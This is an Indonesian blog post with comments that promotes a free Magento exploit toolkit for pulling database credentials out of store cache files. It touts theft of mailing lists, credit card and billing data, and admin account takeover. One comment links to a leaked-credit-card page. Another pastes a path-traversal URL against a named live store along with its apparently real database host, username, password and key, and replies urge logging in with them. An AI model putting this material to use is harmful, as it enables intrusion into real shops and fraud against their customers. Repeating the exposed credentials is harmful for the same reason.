Magento Cache Database Exploit

Magento Cache Database Exploit

Simple toolkit untuk mendapatkan credential database.

Source : https://pastebin.com/weBVNCtA

Usage : php >> exploit.php >> listtarget.txt

Feature : Auto grab db credential from magento cache file ( if vulnerable). Auto check remote database.

Magento Cache Database Exploit

Keuntunganya mungkin bisa digunakan untuk mengambil mailist, leake order data (credit card + billing address), change admin user & password.

Berhubung tool ini saya bagikan gratis, tolong hargai copyright.

Bagi yang ingin merecode atau mengembangakan saya persilahkan dengan ketentuan tidak menghapus nama author.

Big Thanks: YKBlackHat & Official IDN 

Follow this blog...

9 Responses to "Magento Cache Database Exploit"

  1. www.masukangin.net/2017/11/leaked-credit-card-fresh-credit-cards-numbers-with-cvv-and-expiration-date.html

    BalasHapus
  2. pas nyoba, keluarnya gini
    http://www.buyautotruckaccessories.com/magmi/web/download_file.php?file=../../app/etc/local.xml
    type => Bug 2
    domain => http://www.buyautotruckaccessories.com/magmi/web/download_file.php?file=../../app/etc/local.xml
    host => 10.136.211.68
    username => bata
    password => 7racuquzUVa2
    name => bata_prod
    installed => Thu, 06 Nov 2014 19:54:12 +0000
    backend => admin
    key => ae39637ad36b8abeb94ff6d51a22b1c9
    prefix =>
    connection => Failed


    abis itu di apain ya?

    BalasHapus
    Balasan
    1. Login ke db nya kang, dg data diatas..

      Hapus
  3. Untuk tools ny bisa di cek di http://www.masukangin.net/p/download.html

    BalasHapus
  4. login ke dbnya gimana kang ?

    BalasHapus
  5. Host:
    Db name:
    Pass:

    Data itu yg dimsukn di tools kang..

    BalasHapus
  6. Cara Makek nya gimana kang

    BalasHapus
    Balasan
    1. Install xampp

      php >> exploit.php >> listtarget.txt

      Hapus
  7. Download tools dan script

    http://www.masukangin.net/p/download.html
    http://www.diktutor-page.club/masukangin.php

    BalasHapus